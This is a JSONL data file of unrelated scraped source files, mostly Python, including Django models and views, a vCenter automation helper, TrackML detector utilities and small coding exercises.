+{"seq_id":"585140324","text":"import codecs\nimport datetime\nimport os\n\nfrom django.db import models\nfrom pymongo import *\n\n# Create your models here.\n \nclass FileDAO():\n \n def __init__(self, file_id, revision, owner_id):\n client = MongoClient('localhost', 27017)\n db = client.file\n self.fileCol = db.file\n \n self.file_id = int(file_id)\n self.owner_id = int(owner_id)\n self.revision = int(revision)\n if self.revision < 1 :\n self.revision = self.get_max_revision() \n \n self.query = {\"file_id\": self.file_id, \"revision\": self.revision, \"owner_id\": self.owner_id, \"is_active\" : True}\n return\n\n def is_exist(self):\n print(self.query)\n cnt = self.fileCol.find(self.query).count()\n if cnt == 0 :\n return False\n else :\n return True\n\n def read(self):\n return self.fileCol.find_one(self.query)\n\n def read_body(self):\n return self.fileCol.find_one(self.query,\n {\"file_id\" : 1, \"revision\" : 1, \"owner_id\" : 1, \"title\" : 1, \"author\" : 1, \"description\" : 1, \"abstract\" :1 , \"body\" :1})\n\n def read_image(self):\n return self.fileCol.find_one(self.query, {\"image\" :1, \"symbol\" : 1})\n\n def read_all(self):\n return self.fileCol.find_one(self.query)\n\n def update(self, doc, rev_update):\n author = doc[\"author\"].split(\",\")\n doc[\"author\"] = {\n \"author1\" : author[0],\n \"author2\" : author[1],\n \"author3\" : author[2]\n }\n univ = doc[\"univ\"].split(\",\")\n doc[\"univ\"] = {\n \"univ1\" : univ[0],\n \"univ2\" : univ[1],\n \"univ3\" : univ[2]\n }\n if int(rev_update) == 1 :\n doc.update(self.query)\n doc[\"revision\"] = self.get_max_revision() + 1\n return self.fileCol.insert(doc)\n else :\n return self.fileCol.update(self.query, {\"$set\" : doc})\n\n def insert(self, title, description):\n max_id = len(self.fileCol.distinct(\"file_id\"))\n\n doc = {}\n doc[\"file_id\"] = max_id + 1\n doc[\"revision\"] = 1\n doc[\"owner_id\"] = self.owner_id\n doc[\"is_active\"] = True\n doc[\"title\"] = title\n doc[\"description\"] = description\n doc[\"author\"] = \"\"\n doc[\"univ\"] = \"\"\n doc[\"abstract\"] = \"\"\n doc[\"body\"] = \"\"\n doc[\"image\"] = \"\"\n doc[\"symbol\"] = \"\"\n return self.fileCol.insert(doc)\n\n def delete(self):\n doc = {}\n doc[\"is_active\"] = False\n return self.fileCol.update(self.query, {\"$set\" : doc})\n\n def get_file_list(self):\n return self.fileCol.find({\"owner_id\": self.owner_id, \"is_active\": True},\n {\"file_id\" : 1, \"revision\" : 1 , \"title\" : 1, \"description\" : 1}).sort(\"file_id\", 1)\n\n def get_revision_list(self):\n return self.fileCol.find({\"file_id\" : self.file_id, \"is_active\" : True},\n {\"file_id\" : 1, \"revision\" : 1 , \"title\" : 1, \"description\" : 1}).sort(\"revision\", -1)\n\n def get_max_revision(self):\n docs = self.get_revision_list()\n max_revision = 0\n for tmp in docs :\n max_revision = tmp[\"revision\"]\n break\n return max_revision\n\nclass DataFile():\n\n def __init__(self, dataID):\n\n self.fileDir = \"data\"\n self.filename = self.fileDir + \"/\" + dataID\n return\n \n def saveFile(self, text):\n try:\n file = codecs.open(self.filename, \"w\", \"UTF-8\")\n file.write(text)\n file.closed\n return True\n except IOError:\n file.closed\n return False\n\n def readFile(self):\n text = \"\"\n try:\n file = codecs.open(self.filename, \"r\", \"UTF-8\")\n text = file.read()\n file.closed\n except IOError:\n text = \"\"\n return text\n\n def deleteFile(self):\n try:\n os.remove(self.filename)\n return True\n except IOError:\n return False\n","sub_path":"mysite/filemgr/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"425132674","text":"\n\n#calss header\nclass _BOOT():\n\tdef __init__(self,): \n\t\tself.name = \"BOOT\"\n\t\tself.definitions = [u'to kick someone or something hard with the foot: ', u'When a computer boots (up), it becomes ready for use by getting the necessary information into its memory, and when you boot (up) a computer, you cause it to do this.']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_boot.py","file_name":"_boot.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"636785787","text":"# This is question from Cracking the coding interview. Chapter 1.6\n\ndef stringcompression(str1):\n\n prev_chr=''\n tmp=''\n cnt=0\n for i in range(0,len(str1)):\n if prev_chr!=str1[i]:\n if prev_chr!='':\n tmp=tmp+prev_chr+str(cnt)\n prev_chr=str1[i]\n else:\n prev_chr = str1[i]\n cnt=1\n else:\n cnt=cnt+1\n tmp=tmp+str1[i]+str(cnt)\n return tmp\n\ndef stringexpansion(str1):\n\n prev_chr=''\n tmp=''\n for i in range(0,len(str1)):\n if (ord(str1[i])>=65 and ord(str1[i])<=90) or (ord(str1[i])>=97 and ord(str1[i])<=122):\n prev_chr=str1[i]\n\n else:\n j = 0\n while (j < int(str1[i])):\n tmp = tmp + prev_chr\n j = j + 1\n\n return tmp\ndef main():\n str1 = 'aabcccccaa'\n\n print('Compressed String:',stringcompression(str1))\n print('Expaned String:',stringexpansion(stringcompression(str1)))\n\nif __name__=='__main__':\n main()\n","sub_path":"python/Strings/StringCompression.py","file_name":"StringCompression.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"428889588","text":"import urllib.request\nimport json\n\nurl = \"http://m.ovies.at/app/fetch.php\"\nresponse = urllib.request.urlopen(url)\ndata = json.loads(response.read())\nmyList = []\nmyIDList = []\nmyNameList = []\nfor ysa in data['result']:\n print(ysa['mvimg'])\n myList.append(str(ysa['mvimg']))\n myIDList.append(ysa['mvid'])\n myNameList.append(str(ysa['mvname']))\nprint(myList)","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"230174245","text":"import Tkinter, random\nfrom game import *\n\ndim = 10\nlevel = dim // 2\nsquareWidth = 10\ncanvasWidth = size * squareWidth\npayoff = [[1,0],[0,1]]\ncolors = [\"#f91b23\", \"#00a33d\", \"#3131cd\"] #rgb\ng = Game(payoff, dim)\n\ntheWindow = Tkinter.Tk()\ntheWindow.title(\"Moran Model\")\ntheWindow.geometry('+50+50') \n\ntheCanvas = Tkinter.Canvas(theWindow, width = canvasWidth, height = canvasWidth)\ntheCanvas.pack()\ntheImage = Tkinter.PhotoImage(width = canvasWidth, height = canvasWidth)\ntheCanvas.create_image((3,3), image = theImage, anchor = \"nw\", state = \"normal\")\n\ndef startStop():\n global running\n running = not running\n if running:\n goButton.config(text=\"Pause\")\n else:\n goButton.config(text=\"Resume\")\n\ndef colorSquare(i, j):\n theColor = colors[g.board.access([i,j,level])]\n theImage.put(t)\n\n\ndef simulate():\n if running:\n for step in range(1000):\n g.update()\n eDiff = deltaE(i,j)\n if eDiff <= 0 or random.random() < math.exp(-eDiff/T): # Metropolis!\n s[i,j] = -s[i,j]\n colorSquare(i, j)\n theWindow.after(1,simulate) \n","sub_path":"Code/simulation/README.py","file_name":"README.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"286399578","text":"import os\r\nimport time\r\nimport pickle\r\nimport logging\r\nimport argparse\r\nimport numpy as np\r\nimport pandas as pd\r\nimport functools\r\n\r\nimport trackml.dataset\r\n\r\n\r\n#############################################\r\n# DETECTOR UTILS #\r\n#############################################\r\ndef load_detector(detector_path):\r\n detector_orig = pd.read_csv(detector_path)\r\n detector_pfx = detector_path.split(\".\")[0]\r\n detector_preproc = detector_pfx + \".pickle\"\r\n try:\r\n print(\"Loading detector...\")\r\n with open(detector_preproc, \"rb\") as f:\r\n detector = pickle.load(f)\r\n print(\"Detector loaded.\")\r\n except:\r\n print(\"Failed to load preprocessed detector. Building...\")\r\n detector = pd.read_csv(detector_path)\r\n detector = preprocess_detector(detector)\r\n with open(detector_preproc, \"xb\") as f:\r\n pickle.dump(detector, f)\r\n print(\"Detector preprocessed and saved.\")\r\n return detector_orig, detector\r\n\r\n\r\ndef preprocess_detector(detector):\r\n thicknesses = Detector_Thicknesses(detector).get_thicknesses()\r\n rotations = Detector_Rotations(detector).get_rotations()\r\n pixel_size = Detector_Pixel_Size(detector).get_pixel_size()\r\n det = dict(thicknesses=thicknesses, rotations=rotations, pixel_size=pixel_size)\r\n return det\r\n\r\n\r\ndef determine_array_size(detector):\r\n max_v, max_l, max_m = (0, 0, 0)\r\n unique_vols = detector.volume_id.unique()\r\n max_v = max(unique_vols) + 1\r\n for v in unique_vols:\r\n vol = detector.loc[detector[\"volume_id\"] == v]\r\n unique_layers = vol.layer_id.unique()\r\n max_l = max(max_l, max(unique_layers) + 1)\r\n for l in unique_layers:\r\n lay = vol.loc[vol[\"layer_id\"] == l]\r\n unique_modules = lay.module_id.unique()\r\n max_m = max(max_m, max(unique_modules) + 1)\r\n return max_v, max_l, max_m\r\n\r\n\r\nclass Detector_Rotations(object):\r\n def __init__(self, detector):\r\n self.detector = detector\r\n self.max_v, self.max_l, self.max_m = determine_array_size(detector)\r\n\r\n def get_rotations(self):\r\n print(\" Extracting rotations...\")\r\n self._init_rotation_array()\r\n self._extract_all_rotations()\r\n print(\" Done.\")\r\n return self.rot\r\n\r\n def _init_rotation_array(self):\r\n self.rot = np.zeros((self.max_v, self.max_l, self.max_m, 3, 3))\r\n\r\n def _extract_all_rotations(self):\r\n for i, r in self.detector.iterrows():\r\n v, l, m = tuple(map(int, (r.volume_id, r.layer_id, r.module_id)))\r\n rot = self._extract_rotation_matrix(r)\r\n self.rot[v, l, m] = rot\r\n\r\n def _extract_rotation_matrix(self, mod):\r\n \"\"\"\r\n Extract the rotation matrix from module dataframe\r\n \"\"\"\r\n r = np.matrix(\r\n [\r\n [mod.rot_xu.item(), mod.rot_xv.item(), mod.rot_xw.item()],\r\n [mod.rot_yu.item(), mod.rot_yv.item(), mod.rot_yw.item()],\r\n [mod.rot_zu.item(), mod.rot_zv.item(), mod.rot_zw.item()],\r\n ]\r\n )\r\n return r\r\n\r\n\r\nclass Detector_Thicknesses(object):\r\n def __init__(self, detector):\r\n self.detector = detector\r\n self.max_v, self.max_l, self.max_m = determine_array_size(detector)\r\n\r\n def get_thicknesses(self):\r\n print(\" Extracting thicknesses...\")\r\n self._init_thickness_array()\r\n self._extract_all_thicknesses()\r\n print(\" Done.\")\r\n return self.all_t\r\n\r\n def _init_thickness_array(self):\r\n self.all_t = np.zeros((self.max_v, self.max_l, self.max_m))\r\n\r\n def _extract_all_thicknesses(self):\r\n for i, r in self.detector.iterrows():\r\n v, l, m = tuple(map(int, (r.volume_id, r.layer_id, r.module_id)))\r\n self.all_t[v, l, m] = r.module_t\r\n\r\n\r\nclass Detector_Pixel_Size(object):\r\n def __init__(self, detector):\r\n print(detector.keys())\r\n self.detector = detector\r\n self.max_v, self.max_l, self.max_m = determine_array_size(detector)\r\n\r\n def get_pixel_size(self):\r\n print(\" Extracting thicknesses...\")\r\n self._init_size_array()\r\n self._extract_all_size()\r\n print(\" Done.\")\r\n return self.all_s\r\n\r\n def _init_size_array(self):\r\n self.all_s = np.zeros((self.max_v, self.max_l, self.max_m, 2))\r\n\r\n def _extract_all_size(self):\r\n for i, r in self.detector.iterrows():\r\n v, l, m = tuple(map(int, (r.volume_id, r.layer_id, r.module_id)))\r\n self.all_s[v, l, m, 0] = r.pitch_u\r\n self.all_s[v, l, m, 1] = r.pitch_v\r\n","sub_path":"Pipelines/TrackML_Example/LightningModules/Processing/utils/detector_utils.py","file_name":"detector_utils.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"630165085","text":"\"\"\"\nFile name: Stateless.py\nPurpose: Hold vSphere common variables like Admin credentials, Datacenter, Datastore, Cluster and Resources pool.\n\"\"\"\n\nfrom pyVmomi import vim\nfrom pyVim.connect import SmartConnect, SmartConnectNoSSL, Disconnect\nimport atexit\nimport argparse\nimport getpass\nimport ssl\nimport re\n\n\n\nclass StatelessObj():\n\n def __init__(self, vcenter_ip, vcenter_user, vcenter_password):\n \"\"\"\n :param vcenter_ip: ip address ,Type: string\n :param vcenter_user: username ,Type: string\n :param vcenter_password: password ,Type: string\n \"\"\"\n self.vcenter_ip = vcenter_ip\n self.vcenter_user = vcenter_user\n self.vcenter_password = vcenter_password\n\n # Changeable\n self.datacenter = None\n self.datastore = None\n self.cluster = None\n self.RP = None\n\n def set_datacenter(self, datacenter):\n \"\"\"\n Set datacenter\n :param datacenter:\n :return: None\n \"\"\"\n self.datacenter = datacenter\n\n def get_datacenter(self):\n \"\"\"\n Get the object's datacenter\n :return: object's datacenter\n \"\"\"\n return self.datacenter\n\n def datacenter_is_empty(self):\n \"\"\"\n Check if datacenter has a value\n :return:\n \"\"\"\n if self.datacenter == None:\n return True\n return False\n\n def datacenter_to_string(self):\n \"\"\"\n Convert datacenter value to a string and return it\n :return: string of datacenter\n \"\"\"\n return str(self.datacenter)\n\n def set_datastore(self, datastore):\n \"\"\"\n Set datastore\n :param datastore:\n :return: None\n \"\"\"\n self.datastore = datastore\n\n def get_datastore(self):\n \"\"\"\n Get the object's datastore\n :return: object's datastore\n \"\"\"\n return self.datastore\n\n def datastore_is_empty(self):\n \"\"\"\n Check if datastore has a value\n :return:\n \"\"\"\n if self.datastore == None:\n return True\n return False\n\n def datastore_to_string(self):\n \"\"\"\n Convert datastore value to a string and return it\n :return: string of datastore\n \"\"\"\n return str(self.datastore)\n\n def set_cluster(self, cluster):\n \"\"\"\n Set cluster\n :param cluster:\n :return: None\n \"\"\"\n self.cluster = cluster\n\n def get_cluster(self):\n \"\"\"\n Get the object's cluster\n :return: object's cluster\n \"\"\"\n return self.cluster\n\n def cluster_is_empty(self):\n \"\"\"\n Check if cluster has a value\n :return:\n \"\"\"\n if self.cluster == None:\n return True\n return False\n\n def cluster_to_string(self):\n \"\"\"\n Convert cluster value to a string and return it\n :return: string of cluster\n \"\"\"\n return str(self.cluster)\n\n def set_RP(self, RP):\n \"\"\"\n Set RP\n :param RP:\n :return: None\n \"\"\"\n self.RP = RP\n\n def get_RP(self):\n \"\"\"\n Get the object's RP\n :return: object's RP\n \"\"\"\n return self.RP\n\n def RP_is_empty(self):\n \"\"\"\n Check if RP has a value\n :return:\n \"\"\"\n if self.RP == None:\n return True\n return False\n\n def RP_to_string(self):\n \"\"\"\n Convert RP value to a string and return it\n :return: string of RP\n \"\"\"\n return str(self.RP)\n\n \n def login(self):\n \"\"\"\n login function take vcenter ip, user, password and sign in to retrive a service instance.\n :param vcenter_ip: vcenter ip address\n :param vcenter_user: vcenter username \n :param vcenter_password: vcenter password\n :return: service instance content object\n \"\"\"\n #Connectin to vCenter\n context = ssl._create_unverified_context()\n serviceInstance = SmartConnect(host=self.vcenter_ip,\n user=self.vcenter_user,\n pwd=self.vcenter_password,\n port=int(443), sslContext=context)\n if not serviceInstance:\n print(\"Could not connect to the specified host using specified \"\n \"username and password\")\n return -1\n atexit.register(Disconnect, serviceInstance)\n return serviceInstance\n\n\n def logout(self, si):\n \"\"\"\n logout function to logout \n :param si: service instance\n :return: N/A\n \"\"\"\n si.content.sessionManager.Logout()\n\n\n def retrive_content(self, si):\n \"\"\"\n retrive content from a service instance\n :param si: service instance\n :return: service instance content \n \"\"\"\n content = si.RetrieveContent()\n return content\n\n\n def get_obj(self,content, vimtype, name):\n \"\"\"\n take the content and type of vim and name and return the object\n :param content: service instance content\n :param vimtype: the type of vim\n :param the name of the object\n :return: The object in question \n \"\"\"\n obj = None\n container = content.viewManager.CreateContainerView(\n content.rootFolder, vimtype, True)\n for c in container.view:\n if c.name == name:\n obj = c\n break\n return obj\n\n\n def wait_for_task(self,task):\n \"\"\"\n wait for a vCenter task to finish \n :param task: task to be waited for\n :return N/A\n \"\"\"\n task_done = False\n while not task_done:\n if task.info.state == 'success':\n return task.info.result\n\n if task.info.state == 'error':\n print(\"there was an error\")\n task_done = True\n\n\n def mkdir_task(self, base_obj, dir_name):\n \"\"\"\n helper function takes the base object and dir name and creat the folder with dir name\n :param base_obj: base object\n :param dir_name: folder name\n :returns: the base object\n \"\"\"\n try:\n return base_obj.CreateFolder(dir_name)\n except (vim.fault.InvalidName) as e:\n print(e)\n import sys\n\n\n def create_folder(self, content, base_obj, folder_path):\n \"\"\"\n takes the content, base object and nested folder pathe and creats that folder dirctory\n :param content: service instance content\n :param base_obj: base object\n :param folder_path: nested path e.g. /folder1/folder2/folder3\n :return : N/A\n \"\"\"\n folder_path_parts = folder_path.strip('/').split('/')\n for path_part in folder_path_parts:\n if base_obj.childEntity:\n for y, child_obj in enumerate(base_obj.childEntity):\n if child_obj.name == path_part:\n base_obj = child_obj\n break\n elif y >= len(base_obj.childEntity)-1:\n base_obj = self.mkdir_task(base_obj, path_part)\n break\n else:\n base_obj = self.mkdir_task(base_obj, path_part)\n\n\n def test_create_folder(self,content, folder_path):\n \"\"\"\n test the functionality of create_folder and check whether the folder exist or not\n :param content: service instance content\n :param folder_path: nested path e.g. /folder1/folder2/folder3\n \"\"\"\n try:\n dc = self.get_obj(content, [vim.Datacenter], self.datacenter)\n if (self.get_obj(content, [vim.Folder], folder_path)):\n print(\"Folder '%s' already exists\" % folder_path)\n return 1\n else:\n #self.create_folder(content, dc.hostFolder, folder_path)\n #print(\"Successfully created the host folder '%s'\" % folder_path)\n self.create_folder(content, dc.vmFolder, folder_path)\n print(\"Successfully created the VM folder '%s'\" % folder_path)\n return 1\n except:\n return 0\n\n\n\n def GetVMHosts(self,content):\n \"\"\"\n get VM hosts view\n :param content: service instance content\n :return object of VM hosts\n \"\"\"\n host_view = content.viewManager.CreateContainerView(content.rootFolder,[vim.HostSystem],True)\n obj = [host for host in host_view.view]\n host_view.Destroy()\n return obj\n\n\n def Create_vSwitch(self, vcenter, vswitch_Name):\n \"\"\"\n create a virtual switch to the vcenter\n :param hosts: hosts to create virtual switch to\n :param vswitch_Name: the vswitch name \n :return : N/A\n \"\"\"\n for host in vcenter:\n try:\n vswitch_spec = vim.host.VirtualSwitch.Specification()\n vswitch_spec.numPorts = 1024\n vswitch_spec.mtu = 1450\n host.configManager.networkSystem.AddVirtualSwitch(vswitch_Name,vswitch_spec)\n except vim.fault.AlreadyExists:\n print(\"vSwitch {} alredy exist\".format(vswitch_Name))\n\n\n def Create_PortGroup(self,vcenter, vswitch_Name, PG_Name, vlanId):\n \"\"\"\n create a port group to the vcenter and add it to a virtual switch with a spesfic vlan ID\n :param hosts: hosts to create virtual switch to\n :param vswitch_Name: the vswitch name \n :param PG_Name: port group name\n :param vlanId: vlan id number\n :return : N/A\n \"\"\"\n for host in vcenter:\n try:\n portgroup_spec = vim.host.PortGroup.Specification()\n portgroup_spec.vswitchName = vswitch_Name\n portgroup_spec.name = PG_Name\n portgroup_spec.vlanId = int(vlanId)\n network_policy = vim.host.NetworkPolicy()\n network_policy.security = vim.host.NetworkPolicy.SecurityPolicy()\n network_policy.security.allowPromiscuous = True\n network_policy.security.macChanges = False\n network_policy.security.forgedTransmits = False\n portgroup_spec.policy = network_policy\n host.configManager.networkSystem.AddPortGroup(portgroup_spec)\n except vim.fault.AlreadyExists:\n print(\"Port group {} alredy exist in vSwitch {} \".format(PG_Name, vswitch_Name)) \n\n\n def add_nic(self,content, VM, PG_Name):\n \"\"\"\n create a network interface card for a specfic vm and attach it to a port group\n :param content: service instance content\n :param VM: the vm to add the nic to \n :param PG_Name: port group name\n :return : N/A\n \"\"\"\n spec = vim.VM.ConfigSpec()\n nic_changes = []\n\n nic_spec = vim.VM.device.VirtualDeviceSpec()\n nic_spec.operation = vim.VM.device.VirtualDeviceSpec.Operation.add\n\n nic_spec.device = vim.VM.device.VirtualE1000()\n\n nic_spec.device.deviceInfo = vim.Description()\n nic_spec.device.deviceInfo.summary = 'vCenter API test'\n\n network = self.get_obj(content, [vim.Network], PG_Name)\n if isinstance(network, vim.OpaqueNetwork):\n nic_spec.device.backing = vim.VM.device.VirtualEthernetCard.OpaqueNetworkBackingInfo()\n nic_spec.device.backing.opaqueNetworkType = network.summary.opaqueNetworkType\n nic_spec.device.backing.opaqueNetworkId = network.summary.opaqueNetworkId\n else:\n nic_spec.device.backing = vim.VM.device.VirtualEthernetCard.NetworkBackingInfo()\n nic_spec.device.backing.useAutoDetect = False\n nic_spec.device.backing.deviceName = network.name\n\n nic_spec.device.connectable = vim.VM.device.VirtualDevice.ConnectInfo()\n nic_spec.device.connectable.startConnected = True\n nic_spec.device.connectable.allowGuestControl = True\n nic_spec.device.connectable.connected = False\n nic_spec.device.connectable.status = 'untried'\n nic_spec.device.wakeOnLanEnabled = True\n nic_spec.device.addressType = 'assigned'\n\n nic_changes.append(nic_spec)\n spec.deviceChange = nic_changes\n #e = VM.ReconfigVM_Task(spec=spec)\n print(\"NIC CARD ADDED\")\n\n\n \n def clone_vm(self,content, VM_Name, Template_Name, Folder_Path, IP_Address, Gateway,NetMask, DNS_Server):\n \"\"\"\n clone a virtual machine from a template\n :param content: service instance content\n :param VM_Name: the virtual machine name\n :param Template_Name: template name to be cloned\n :param IP_Address: ip adress of the VM\n :param Gateway: the Gateway of the virtual machine\n :param NetMask: network mask\n :param DNS_Server: the DNS server\n :return N/A\n \"\"\"\n\n if self.datacenter == None:\n return -1\n if self.datastore == None:\n return -1\n if self.RP == None:\n return -1\n\n try:\n # if none git the first one\n datacenter = self.get_obj(content, [vim.Datacenter], self.datacenter)\n\n destfolder = self.get_obj(content, [vim.Folder], Folder_Path)\n # destfolder = datacenter.vmFolde\n datastore = self.get_obj(content, [vim.Datastore], self.datastore)\n\n # if None, get the first one\n cluster = self.get_obj(content, [vim.ClusterComputeResource], self.cluster)\n\n resource_pool = self.get_obj(content, [vim.ResourcePool], self.RP)\n\n TheTemplate = self.get_obj(content, [vim.VirtualMachine], Template_Name)\n\n # datastore = self.get_obj(content, [vim.Datastore], real_datastore_name)\n\n vmconf = vim.vm.ConfigSpec()\n\n # if datastorecluster_name:\n # podsel = vim.storageDrs.PodSelectionSpec()\n # pod = get_obj(content, [vim.StoragePod], datastorecluster_name)\n # podsel.storagePod = pod\n\n # storagespec = vim.storageDrs.StoragePlacementSpec()\n # storagespec.podSelectionSpec = podsel\n # storagespec.type = 'create'\n # storagespec.folder = destfolder\n # storagespec.resourcePool = resource_pool\n # storagespec.configSpec = vmconf\n\n try:\n rec = content.storageResourceManager.RecommendDatastores(\n storageSpec=storagespec)\n rec_action = rec.recommendations[0].action[0]\n real_datastore_name = rec_action.destination.name\n except:\n real_datastore_name = TheTemplate.datastore[0].info.name\n\n # set relospec\n relospec = vim.vm.RelocateSpec()\n relospec.datastore = datastore\n relospec.pool = resource_pool\n\n clonespec = vim.vm.CloneSpec()\n clonespec.location = relospec\n clonespec.powerOn = True\n\n print(\"cloning VM...\")\n task = TheTemplate.Clone(folder=destfolder, name=VM_Name, spec=clonespec)\n\n\n #self.wait_for_task(task)\n\n return 1\n except Exception as e:\n print(\"Stateless Debug Message :\" + str(e), file=sys.stderr)\n return 0\n\n\n def motd(self, content, message):\n \"\"\"\n message of the day on vcenter\n :param message: message to be sent \n :param content: service instance content\n \"\"\"\n content.content.sessionManager.UpdateServiceMessage(message=message)\n\n","sub_path":"flask/lib/Stateless.py","file_name":"Stateless.py","file_ext":"py","file_size_in_byte":15602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"633767388","text":"from django.shortcuts import render\nfrom dc_app.serializers import MajorSerializer,CredentialSerializer,UserprofileSerializer,NewsSerializer\n# Create your views here.\nfrom django.http import Http404\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\nfrom rest_framework.decorators import api_view\nfrom rest_framework import permissions\nfrom django.http import HttpResponse\nfrom dc_app.models import Credential,Major,News\nfrom rest_framework import permissions\n#from dc_app.permissions import IsSuperOrReadOnly\nimport random\nfrom dc_app.models import EmailVerityRecord\nimport json\nfrom django.core.mail import send_mail\nfrom DC.settings import EMAIL_FROM\nerror = {'status':'error'}\nok = {'status':'ok'}\n\n\nclass MajorList(APIView):\n\tdef get(self,request):\n\t\tmajor = Major.objects.all()\n\t\tserializer = MajorSerializer(major,many=True)\n\t\treturn Response(serializer.data)\n\tdef post(self,request):\n\t\t#self.check_object_permissions(request, obj)\n\t\tserializer = MajorSerializer(data=request.data)\n\t\tif serializer.is_valid():\n\t\t\tserializer.save()\n\t\t\treturn Response(serializer.data,status=status.HTTP_201_CREATED)\n\t\treturn Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass MajorDetail(APIView):\n\tdef get_object(self,pk):#pk代表主键\n\t\ttry:\n\t\t\treturn Major.objects.get(pk=pk)\n\t\texcept Major.DoesNotExist:\n\t\t\traise Http404\n\n\tdef get(self,request,pk):\n\t\tmajor =self.get_object(pk)\n\t\tserializer = MajorSerializer(major)\n\t\treturn Response(serializer.data)\n\nclass CredentialList(APIView):\n\t#permission_classes = (permissions.IsAdminUser,)\n\tdef get_object(self):\n\t\tobj = get_object_or_404(self.get_queryset())\n\t\tself.check_object_permissions(self.request, obj)\n\t\treturn obj\n\tdef get(self,request):\n\t\tcredential = Credential.objects.all()\n\t\tserializer = CredentialSerializer(credential,many=True)\n\t\treturn Response(serializer.data)\n\tdef post(self,request):\n\t\t#if self.check_object_permissions():\n\t\t#self.check_object_permissions(request, obj)\n\t\t\t#print('what fuck')\n\t\tserializer =CredentialSerializer(data=request.data)\n\t\tif serializer.is_valid():#request.data和Response基于APIView和@api_view的\n\t\t\tserializer.save() #reques.data获取post,put等提交的数据\n\t\t\treturn Response(serializer.data,status=status.HTTP_201_CREATED)\n\t\treturn Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\t\t#else:\n\t\t#\treturn Response(errors)\ndef credential(request):\n\tif request.method == 'GET':\n\t\tcredential = Credential.objects.all()\n\t\tcre = []\n\t\tfor x in credential:\n\t\t\tcre.append(x.c_name)\n\n\t\treturn HttpResponse(json.dumps(cre))\ndef major(request):\n\tif request.method == 'GET':\n\t\tcredential = Major.objects.all()\n\t\tcre = []\n\t\tfor x in credential:\n\t\t\tcre.append(x.m_name)\n\n\t\treturn HttpResponse(json.dumps(cre))\n\n\nclass CredentialDetail(APIView):\n\tdef get_object(self,pk):\n\t\ttry:\n\t\t\treturn Credential.objects.get(pk=pk)\n\t\texcept Credential.DoesNotExist:\n\t\t\traise Http404\n\tdef get(self,request,pk):\n\t\t#permission_classes = (permissions.IsAdminUser,)\n\t\tc = self.get_object(pk)\n\t\t#name = request.GET['name']\n\t\t#c = Credential.objects.get(c_name=name)\n\t\tserializer = CredentialSerializer(c)\n\t\treturn Response(serializer.data)\n\nclass MajorSelect(APIView):\n\tdef get(self,request):\n\t\tname = request.query_params['name']#这个获取url参数,和request.GET['']功能一样\n\t\ttry:\t\t\t\t\t\t\t\t\n\t\t\tm = Major.objects.get(m_name=name)\n\t\t\tmajor = MajorSerializer(m)\n\t\t\treturn Response(major.data)\n\t\texcept:\n\t\t\traise Http404\nclass CredentialSelect(APIView):\n\tdef get(self,request):\n\t\tname = request.query_params['name']\n\t\tprint(name,90)\n\t\ttry:\n\t\t\tm = Credential.objects.get(c_name=name)\n\t\t\tcredential = CredentialSerializer(m)\n\t\t\treturn Response(credential.data)\n\t\texcept:\n\t\t\traise Http404\n\nclass Update_profile(APIView):\n\tdef put(self,request):\n\t\tdata = request.data\n\t\tuser = User.objects.get(pk=data['id'])\n\t\tuser = UseUserprofileSerializer(user,data=request.data)\n\t\tuser.save()\n\n\t\t\nclass UserDetail(APIView):\n\tdef get(self,request):\n\t\ti = request.query_params['id']\n\t\tusers = User.objects.get(pk=i)#.select_related('user')\n\t\tserializer = UserprofileSerializer(users)\n\t\treturn Response(serializer.data)\n\tdef put(self,request):\n\t\tdata = request.data\n\t\tuser = User.objects.get(pk=data['id'])\n\t\tusers = UserprofileSerializer(user,data=request.data)\n\t\tif users.is_valid():\n\t\t\tusers.save()\n\t\t\treturn Response(users.data)\n\t\treturn Response(users.errors,status=status.HTTP_400_BAD_REQUEST)\n\n\n\ndef send_register_email(request):\n email_record=EmailVerityRecord()\n email=request.GET[\"email\"]\n email_record.email=email\n email_title = '邮件标题'\n random_s = random.randint(100000,999999)\n a = str(random_s)\n email_record.code=a\n email_record.save()\n email_body = '关于我公司的验证码:%s 你好,我是王磊,我在用Python给你发邮箱,哈哈哈哈哈'%(a)\n email = email # 对方的邮箱\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n\n if send_status:\n return HttpResponse(\"ok\")\n\n # return HttpResponse(\"SJFSKD\")\n\ndef yanzhengqq(request):\n if request.method=='GET':\n #b=EmailVerityRecord.objects.all()\n email = request.GET[\"email\"]\n try:\n b=EmailVerityRecord.objects.get(email=email)\n except:\n return HttpResponse(json.dumps({\"email\": \"false\"}))\n\n if b.code == yanzhengma: #tanzhengma in b:\n return HttpResponse(json.dumps({\"message\":\"ok\"}))\n else:\n return HttpResponse(json.dumps({\"message\":\"false\"}))\n","sub_path":"dc_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
